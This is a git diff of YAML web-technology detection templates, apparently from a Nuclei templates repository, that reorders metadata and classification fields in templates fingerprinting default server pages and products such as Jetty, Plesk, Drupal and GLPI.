4b0a004830460221009d9c3022e47a42f0074a131ea0e58a725701de85ca16d5ff245204b63089d259022100ad46b2a4e3bf2e755956e61000c6c6703cb5114351a2d0b05fd782efea66a16e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009d9c3022e47a42f0074a131ea0e58a725701de85ca16d5ff245204b63089d259022100ad46b2a4e3bf2e755956e61000c6c6703cb5114351a2d0b05fd782efea66a16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-fedora-page.yaml b/http/technologies/default-fedora-page.yaml index d77cfeadbc..577a30747d 100644 --- a/http/technologies/default-fedora-page.yaml +++ b/http/technologies/default-fedora-page.yaml @@ -4,15 +4,15 @@ info: name: Fedora Default Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Test Page for the HTTP Server on Fedora" - product: fedora - vendor: fedoraproject - tags: tech,fedora - classification: cpe: cpe:2.3:o:fedoraproject:fedora:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fedoraproject + product: fedora + shodan-query: http.title:"Test Page for the HTTP Server on Fedora" + tags: tech,fedora + http: - method: GET path: @@ -24,4 +24,4 @@ http: - 'Test Page for the HTTP Server on Fedora' part: body -# digest: 490a0046304402200b6a1d0c3d7b5cb4af003fd8709013d9a477d6c455e55f82949e22cd2c5d12670220786bd0fe6b258195168e5d0cc0f358b5fa0d5cb3f2b2f66fff24f42ffcff4972:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200b6a1d0c3d7b5cb4af003fd8709013d9a477d6c455e55f82949e22cd2c5d12670220786bd0fe6b258195168e5d0cc0f358b5fa0d5cb3f2b2f66fff24f42ffcff4972:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-glassfish-server-page.yaml b/http/technologies/default-glassfish-server-page.yaml index 853900b5e5..e9441a9e22 100644 --- a/http/technologies/default-glassfish-server-page.yaml +++ b/http/technologies/default-glassfish-server-page.yaml @@ -4,15 +4,15 @@ info: name: GlassFish Server Default Page author: dhiyaneshDk,righettod severity: info - metadata: - max-request: 1 - shodan-query: http.title:"GlassFish Server - Server Running" - product: glassfish_server - vendor: oracle - tags: tech,glassfish - classification: cpe: cpe:2.3:a:oracle:glassfish_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: oracle + product: glassfish_server + shodan-query: http.title:"GlassFish Server - Server Running" + tags: tech,glassfish + http: - method: GET path: @@ -31,4 +31,5 @@ http: group: 1 regex: - 'GlassFish\s+Server\s+([A-Za-z0-9\s.]+)(\n|\r)' -# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022060aa5b4e6c78b2d5c364211a1ca4ecba6f63f83702136b580e80a8813fc40395022100de1a55dc578acda9cf937456c406ab3013711c66ea2a236d8c957cc4e5937fb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-jetty-page.yaml b/http/technologies/default-jetty-page.yaml index 7a4fe3ccac..288ebd41d8 100644 --- a/http/technologies/default-jetty-page.yaml +++ b/http/technologies/default-jetty-page.yaml @@ -4,15 +4,15 @@ info: name: Jetty Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Powered By Jetty" - product: jetty - vendor: eclipse - tags: tech,jetty - classification: cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: eclipse + product: jetty + shodan-query: http.title:"Powered By Jetty" + tags: tech,jetty + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Powered By Jetty" part: body -# digest: 4a0a0047304502200fe50eaa793d32dd59108293fef120b82b4891e7b389e2a3ebe8809c8112e92a022100ebd2558f29c92cba41b19a0f0ea3e022823a3f3efdc75460ab820e94250b2443:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200fe50eaa793d32dd59108293fef120b82b4891e7b389e2a3ebe8809c8112e92a022100ebd2558f29c92cba41b19a0f0ea3e022823a3f3efdc75460ab820e94250b2443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-lighttpd-page.yaml b/http/technologies/default-lighttpd-page.yaml index 5018ad8e07..46f74f20d4 100644 --- a/http/technologies/default-lighttpd-page.yaml +++ b/http/technologies/default-lighttpd-page.yaml @@ -4,15 +4,15 @@ info: name: lighttpd Default Page author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Powered by lighttpd" - product: lighttpd - vendor: lighttpd - tags: tech,lighttpd - classification: cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lighttpd + product: lighttpd + shodan-query: http.title:"Powered by lighttpd" + tags: tech,lighttpd + http: - method: GET path: @@ -28,4 +28,4 @@ http: status: - 200 -# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-lighttpd-placeholder-page.yaml b/http/technologies/default-lighttpd-placeholder-page.yaml index c8e84f9d3d..b651d28922 100644 --- a/http/technologies/default-lighttpd-placeholder-page.yaml +++ b/http/technologies/default-lighttpd-placeholder-page.yaml @@ -4,15 +4,15 @@ info: name: Lighttpd Placeholder Page author: idealphase severity: info - metadata: - max-request: 1 - shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself" - product: lighttpd - vendor: lighttpd - tags: tech,lighttpd - classification: cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lighttpd + product: lighttpd + shodan-query: "If you find a bug in this Lighttpd package, or in Lighttpd itself" + tags: tech,lighttpd + http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 490a0046304402207bbd50cbd24cbdba72b8ed88f7a98e3ba3ac7ba2ead08b276f42d7a713e59c0f022007f8916863aab5b425262574a27ec9a198ac6366682cd883ff50101063639a37:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207bbd50cbd24cbdba72b8ed88f7a98e3ba3ac7ba2ead08b276f42d7a713e59c0f022007f8916863aab5b425262574a27ec9a198ac6366682cd883ff50101063639a37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-movable-page.yaml b/http/technologies/default-movable-page.yaml index 9ccc875f22..bfd0a7f48a 100644 --- a/http/technologies/default-movable-page.yaml +++ b/http/technologies/default-movable-page.yaml @@ -4,6 +4,8 @@ info: name: Movable Default Page author: dhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Welcome to Movable Type" @@ -11,8 +13,6 @@ info: vendor: sixapart tags: tech,movable - classification: - cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/default-openresty.yaml b/http/technologies/default-openresty.yaml index a092058f93..4ee7974e06 100644 --- a/http/technologies/default-openresty.yaml +++ b/http/technologies/default-openresty.yaml @@ -4,15 +4,15 @@ info: name: OpenResty Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Welcome to OpenResty!" - product: openresty - vendor: openresty - tags: tech,openresty - classification: cpe: cpe:2.3:a:openresty:openresty:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: openresty + product: openresty + shodan-query: http.title:"Welcome to OpenResty!" + tags: tech,openresty + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Welcome to OpenResty!" part: body -# digest: 4a0a0047304502203d2e8200dac9b663ecac011e4a3f12f86ed21dff7384a7c66e06a5fcfb1c2b790221008c60b1d9ec24d2701fa9c03a580c52ea699fea0172e454874ca783f2da28ff72:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d2e8200dac9b663ecac011e4a3f12f86ed21dff7384a7c66e06a5fcfb1c2b790221008c60b1d9ec24d2701fa9c03a580c52ea699fea0172e454874ca783f2da28ff72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-parallels-plesk.yaml b/http/technologies/default-parallels-plesk.yaml index e14c8839d0..f6540101ff 100644 --- a/http/technologies/default-parallels-plesk.yaml +++ b/http/technologies/default-parallels-plesk.yaml @@ -4,16 +4,16 @@ info: name: Default Parallels Plesk Panel Page author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Default Parallels Plesk Panel Page" - product: parallels_plesk_panel vendor: parallels + product: parallels_plesk_panel + shodan-query: title:"Default Parallels Plesk Panel Page" tags: tech,default-page,parallels,plesk - classification: - cpe: cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 4b0a00483046022100f5ef50f41341320ce1aa65b364bc353b9f52a53ebe15ce8d7c3e69c8d6d82a75022100d960f2065565be892a9552a1836ae9ceba87fe0c513b8850da96ab118a9cf6c5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f5ef50f41341320ce1aa65b364bc353b9f52a53ebe15ce8d7c3e69c8d6d82a75022100d960f2065565be892a9552a1836ae9ceba87fe0c513b8850da96ab118a9cf6c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-payara-server-page.yaml b/http/technologies/default-payara-server-page.yaml index 2ed4b84138..91094eb300 100644 --- a/http/technologies/default-payara-server-page.yaml +++ b/http/technologies/default-payara-server-page.yaml @@ -4,15 +4,15 @@ info: name: Payara Server Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Payara Server - Server Running" - product: payara - vendor: payara - tags: tech,payara - classification: cpe: cpe:2.3:a:payara:payara:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: payara + product: payara + shodan-query: http.title:"Payara Server - Server Running" + tags: tech,payara + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Payara Server - Server Running" part: body -# digest: 490a00463044022030e0025b825e09cf993dbb12d9d234cec3e0176fd7be502944868f91204daf5a02206543383c7d33d1be4fe6621cd8a9fbdf714057d2d784c4d5e9c05c01aa26e1ed:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022030e0025b825e09cf993dbb12d9d234cec3e0176fd7be502944868f91204daf5a02206543383c7d33d1be4fe6621cd8a9fbdf714057d2d784c4d5e9c05c01aa26e1ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-plesk-page.yaml b/http/technologies/default-plesk-page.yaml index fea9338d75..108e714e1f 100644 --- a/http/technologies/default-plesk-page.yaml +++ b/http/technologies/default-plesk-page.yaml @@ -4,15 +4,15 @@ info: name: Plesk Default Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Web Server's Default Page" - product: plesk - vendor: plesk - tags: tech,plesk - classification: cpe: cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: plesk + product: plesk + shodan-query: http.title:"Web Server's Default Page" + tags: tech,plesk + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Web Server's Default Page" part: body -# digest: 490a0046304402204a1382a42c6858f9637b333b97d69cfe08532b4853be93c995372384477f61e90220259c322c2aca3af8714bf2ea87f723794b07f29fc1da51803b78af38f48fc599:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204a1382a42c6858f9637b333b97d69cfe08532b4853be93c995372384477f61e90220259c322c2aca3af8714bf2ea87f723794b07f29fc1da51803b78af38f48fc599:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-redhat-test-page.yaml b/http/technologies/default-redhat-test-page.yaml index 31132dadd3..e6a4e88bea 100644 --- a/http/technologies/default-redhat-test-page.yaml +++ b/http/technologies/default-redhat-test-page.yaml @@ -4,15 +4,15 @@ info: name: Red Hat Enterprise Linux Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" - product: enterprise_linux_server - vendor: redhat - tags: tech,redhat - classification: cpe: cpe:2.3:o:redhat:enterprise_linux_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: redhat + product: enterprise_linux_server + shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" + tags: tech,redhat + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" part: body -# digest: 4a0a0047304502200f10ec858e5a0347954ce4a1aed87801cc3cb17fa2446ad2a57f18b51344789b0221008347e4e3282fc734b53c8e559998af04e319cc89a9952e6479cabf9622008681:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f10ec858e5a0347954ce4a1aed87801cc3cb17fa2446ad2a57f18b51344789b0221008347e4e3282fc734b53c8e559998af04e319cc89a9952e6479cabf9622008681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-sitecore-page.yaml b/http/technologies/default-sitecore-page.yaml index e3ac33528e..c25b4eb326 100644 --- a/http/technologies/default-sitecore-page.yaml +++ b/http/technologies/default-sitecore-page.yaml @@ -8,16 +8,16 @@ info: Detect Sitecore Content Management System (CMS). reference: | https://www.sitecore.com/ + classification: + cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Welcome to Sitecore" - product: experience_platform vendor: sitecore + product: experience_platform + shodan-query: http.title:"Welcome to Sitecore" tags: tech,sitecore,cms - classification: - cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 490a0046304402206b0002615fd8de5ad50ccbe0fbff31092eaf902cab71b4e408f60f08052df1a202206e16fd0e04ce91761ab29cd8c268939227f39a6494925175e6775305051000f5:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b0002615fd8de5ad50ccbe0fbff31092eaf902cab71b4e408f60f08052df1a202206e16fd0e04ce91761ab29cd8c268939227f39a6494925175e6775305051000f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-ssltls-test-page.yaml b/http/technologies/default-ssltls-test-page.yaml index b58249d4ec..4467a700b5 100644 --- a/http/technologies/default-ssltls-test-page.yaml +++ b/http/technologies/default-ssltls-test-page.yaml @@ -4,15 +4,15 @@ info: name: SSL/TLS-aware Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site" - product: http_server - vendor: apache - tags: tech,ssltls - classification: cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: http_server + shodan-query: http.title:"Test Page for the SSL/TLS-aware Apache Installation on Web Site" + tags: tech,ssltls + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Test Page for the SSL/TLS-aware Apache Installation on Web Site" part: body -# digest: 4a0a00473045022052db37eee2144325d27e85820b54b42327f31fa95a5b4b9b7177ce8d9b524d4e022100fa7cd5b538cd1114c07bf1d59453537b284079200ecdf54e1977e1ca54444784:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022052db37eee2144325d27e85820b54b42327f31fa95a5b4b9b7177ce8d9b524d4e022100fa7cd5b538cd1114c07bf1d59453537b284079200ecdf54e1977e1ca54444784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-symfony-page.yaml b/http/technologies/default-symfony-page.yaml index ea896920f9..855e78b453 100644 --- a/http/technologies/default-symfony-page.yaml +++ b/http/technologies/default-symfony-page.yaml @@ -4,16 +4,16 @@ info: name: Symfony Default Page author: pussycat0x severity: info + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Welcome to Symfony" - product: symfony vendor: sensiolabs + product: symfony + shodan-query: http.title:"Welcome to Symfony" tags: tech,symfony,default-page - classification: - cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: regex: - "([0-9.]+)" -# digest: 4a0a00473045022100f64c890cd70b8e53f2cccb4253df4c3b1c391059ffe64a5361212a74aa6c31e102203df7cb56e17415c6653babcd042acb925e05ef4152f342eaef200aa772de1867:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f64c890cd70b8e53f2cccb4253df4c3b1c391059ffe64a5361212a74aa6c31e102203df7cb56e17415c6653babcd042acb925e05ef4152f342eaef200aa772de1867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-tengine-page.yaml b/http/technologies/default-tengine-page.yaml index 80473654b3..6fe34baa6b 100644 --- a/http/technologies/default-tengine-page.yaml +++ b/http/technologies/default-tengine-page.yaml @@ -4,16 +4,16 @@ info: name: Tengine Default Page author: pussycat0x severity: info + classification: + cpe: cpe:2.3:a:alibaba:tengine:*:*:*:*:nginx:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Welcome to tengine" - product: tengine vendor: alibaba + product: tengine + shodan-query: http.title:"Welcome to tengine" tags: tech,tengine,default-page - classification: - cpe: cpe:2.3:a:alibaba:tengine:*:*:*:*:nginx:*:*:* http: - method: GET path: @@ -32,4 +32,4 @@ http: status: - 200 -# digest: 4a0a00473045022061a22a21552586e5cb2d8c629eb94935f7c96e6f2e834ce68b2f529e0b0a3ebb022100b83b357e972f5340bc33371042896ab6e4fc01e24b536970b11f3e33589af970:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022061a22a21552586e5cb2d8c629eb94935f7c96e6f2e834ce68b2f529e0b0a3ebb022100b83b357e972f5340bc33371042896ab6e4fc01e24b536970b11f3e33589af970:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/default-websphere-liberty.yaml b/http/technologies/default-websphere-liberty.yaml index ae95a2ad4a..188df42607 100644 --- a/http/technologies/default-websphere-liberty.yaml +++ b/http/technologies/default-websphere-liberty.yaml @@ -4,16 +4,16 @@ info: name: WebSphere Liberty Default Page author: oppsec severity: info + classification: + cpe: cpe:2.3:a:ibm:websphere_liberty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"WebSphere Liberty" - product: websphere_liberty vendor: ibm + product: websphere_liberty + shodan-query: http.title:"WebSphere Liberty" tags: tech,websphere,liberty - classification: - cpe: cpe:2.3:a:ibm:websphere_liberty:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: regex: - "(WebSphere Liberty).*?([a-zA-Z0-9.-]+)" -# digest: 4b0a00483046022100c675cf6212578eac4d8bf53307bac4a8945cdf4891c4677bbb024b84c4ea858a0221009226a87945897e1e50379fd245515a95b6b70eec9f55b7f815859d1de3d1dbed:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c675cf6212578eac4d8bf53307bac4a8945cdf4891c4677bbb024b84c4ea858a0221009226a87945897e1e50379fd245515a95b6b70eec9f55b7f815859d1de3d1dbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 096bbe0aff..2fe2c4f9b8 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -9,15 +9,15 @@ info: reference: - https://github.com/DevExpress/aspnet-security-bestpractices/blob/master/SecurityBestPractices.WebForms/README.md#53-information-exposure-through-source-code - https://supportcenter.devexpress.com/ticket/details/q311748/dxr-axd-what-is-it-and-how-to-disable-it - metadata: - max-request: 1 - shodan-query: html:"DXR.axd" - product: devexpress_components - vendor: devexpress - tags: devexpress,iis,microsoft,asp,tech - classification: cpe: cpe:2.3:a:devexpress:devexpress_components:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: devexpress + product: devexpress_components + shodan-query: html:"DXR.axd" + tags: devexpress,iis,microsoft,asp,tech + http: - method: GET path: @@ -30,4 +30,5 @@ http: part: body words: - "DXR.axd" -# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml index aae33ae88b..1582d78b5d 100644 --- a/http/technologies/directus-detect.yaml +++ b/http/technologies/directus-detect.yaml @@ -8,16 +8,16 @@ info: Directus is a content manager with dynamic access API generation and transparent integration with the main databases. reference: - https://directus.io/ + classification: + cpe: cpe:2.3:a:monospace:directus:*:*:*:*:-:*:*:* metadata: verified: true max-request: 1 - google-query: 'X-Powered-By: Directus' - product: directus vendor: monospace + product: directus + google-query: 'X-Powered-By: Directus' tags: tech,directus,detect - classification: - cpe: cpe:2.3:a:monospace:directus:*:*:*:*:-:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: words: - "X-Powered-By: Directus" case-insensitive: true -# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402201c1b4978d386631e676b45fc6b59fb4c8ae13b345b464cdd1bfefe5840e2a3800220499da0d0b93930d1a5d080db752255740841748c0e6ea6a3799b81544e071e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/drupal-detect.yaml b/http/technologies/drupal-detect.yaml index f62c0840bc..a4351dbd8f 100644 --- a/http/technologies/drupal-detect.yaml +++ b/http/technologies/drupal-detect.yaml @@ -4,16 +4,16 @@ info: name: Drupal Detection author: 1nf1n7y severity: info + classification: + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: http.component:"Drupal" - product: drupal vendor: drupal + product: drupal + shodan-query: http.component:"Drupal" tags: tech,drupal - classification: - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: regex: - 'class="site-version">([0-9.x-]+)' -# digest: 490a0046304402206b42e6e66bef90d25a1554d6b8dea3838be21a3a6ce7dbf18a65146e41452be7022051ee7c9657b73164a633a9e41e6a0cdfc4847c9c9aa865908caab233866901b8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b42e6e66bef90d25a1554d6b8dea3838be21a3a6ce7dbf18a65146e41452be7022051ee7c9657b73164a633a9e41e6a0cdfc4847c9c9aa865908caab233866901b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/elasticsearch-sql-client-detect.yaml b/http/technologies/elasticsearch-sql-client-detect.yaml index f27ad1cb17..bd1bbc237e 100644 --- a/http/technologies/elasticsearch-sql-client-detect.yaml +++ b/http/technologies/elasticsearch-sql-client-detect.yaml @@ -5,15 +5,15 @@ info: author: pussycat0x severity: low description: Elasticsearch detected SQL client. - metadata: - max-request: 1 - shodan-query: http.title:"Elasticsearch-sql client" - product: elasticsearch - vendor: elastic - tags: elasticsearch,tech,sql - classification: cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: elastic + product: elasticsearch + shodan-query: http.title:"Elasticsearch-sql client" + tags: elasticsearch,tech,sql + http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 490a004630440220276e96734ee9717940ec0f594e445b97d2a87382586b66013d5d53da6eb0c7bf0220305a0bb73e6413ee0b510ff3339532e683b201600f1363c4a8e917c6b41eab47:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220276e96734ee9717940ec0f594e445b97d2a87382586b66013d5d53da6eb0c7bf0220305a0bb73e6413ee0b510ff3339532e683b201600f1363c4a8e917c6b41eab47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/element-web-detect.yaml b/http/technologies/element-web-detect.yaml index c4f7bce756..ae6297b85f 100644 --- a/http/technologies/element-web-detect.yaml +++ b/http/technologies/element-web-detect.yaml @@ -5,16 +5,16 @@ info: author: davidegirardi severity: info description: Identify if a web application is vanilla Element Web and return the version + classification: + cpe: cpe:2.3:a:matrix:element:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"manifest.json" - product: element vendor: matrix + product: element + shodan-query: html:"manifest.json" tags: tech,matrix,element,detect - classification: - cpe: cpe:2.3:a:matrix:element:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: part: body regex: - '[^\s]+' -# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/empirecms-detect.yaml b/http/technologies/empirecms-detect.yaml index 9c8a185704..f802eb2124 100644 --- a/http/technologies/empirecms-detect.yaml +++ b/http/technologies/empirecms-detect.yaml @@ -4,15 +4,15 @@ info: name: EmpireCMS Detect author: princechaddha severity: info - metadata: - max-request: 1 - shodan-query: http.html:EmpireCMS - product: empirecms - vendor: phome - tags: tech,empirecms - classification: cpe: cpe:2.3:a:phome:empirecms:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: phome + product: empirecms + shodan-query: http.html:EmpireCMS + tags: tech,empirecms + http: - method: GET path: @@ -24,4 +24,4 @@ http: regex: - '' -# digest: 4b0a00483046022100e7b0fdbe31101929f3825c65599aa989d9ddea110b1096d2a44f453ace2e65fc022100d5eba571fc451ad5db3a6a7949cc063acc5d57bb2d886054841cb7e6f1b98a45:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e7b0fdbe31101929f3825c65599aa989d9ddea110b1096d2a44f453ace2e65fc022100d5eba571fc451ad5db3a6a7949cc063acc5d57bb2d886054841cb7e6f1b98a45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/gitbook-detect.yaml b/http/technologies/gitbook-detect.yaml index de519ca79e..fbb54cdcf7 100644 --- a/http/technologies/gitbook-detect.yaml +++ b/http/technologies/gitbook-detect.yaml @@ -6,17 +6,17 @@ info: severity: info description: GitBook is a collaborative documentation tool that allows anyone to document anything—such as products and APIs—and share knowledge through a user-friendly online platform. reference: https://www.gitbook.com/ + classification: + cpe: cpe:2.3:a:gitbook:gitbook:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: gitbook + product: gitbook shodan-query: http.title:"gitbook" fofa: app="Introduction-GitBook" - product: gitbook - vendor: gitbook tags: tech,gitbook - classification: - cpe: cpe:2.3:a:gitbook:gitbook:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,4 @@ http: - '' - '(?m)' -# digest: 490a00463044022051c8db0d578ee59a851dbbc2792ca3e5dea61176125b543fd9f2f0bc62d160dc02204e865046049fcecf4fcf21561162fa2a03f74407923f5ee40c6259a7cbcfc26a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022051c8db0d578ee59a851dbbc2792ca3e5dea61176125b543fd9f2f0bc62d160dc02204e865046049fcecf4fcf21561162fa2a03f74407923f5ee40c6259a7cbcfc26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/glpi-status-page.yaml b/http/technologies/glpi-status-page.yaml index 610f1afa44..2a5bb6c7d1 100644 --- a/http/technologies/glpi-status-page.yaml +++ b/http/technologies/glpi-status-page.yaml @@ -8,16 +8,16 @@ info: A php status page that indicates if local or ldap identity is used for glpi. reference: - https://buildmedia.readthedocs.org/media/pdf/glpi-user-documentation/latest/glpi-user-documentation.pdf + classification: + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"glpi" - product: glpi vendor: glpi-project + product: glpi + shodan-query: http.html:"glpi" tags: tech,status,glpi - classification: - cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 490a0046304402200a32d522f5f00075eeeb3eb54bfad76315399d4ab6d356ad8788a0493e91601a022040a04b8cbbbd7f4c21319181ae9e3c1ae7e92d9cf1933397a89112eb2d6a7dc8:922c64590222798bb761d5b6d8e72950 +# digest: 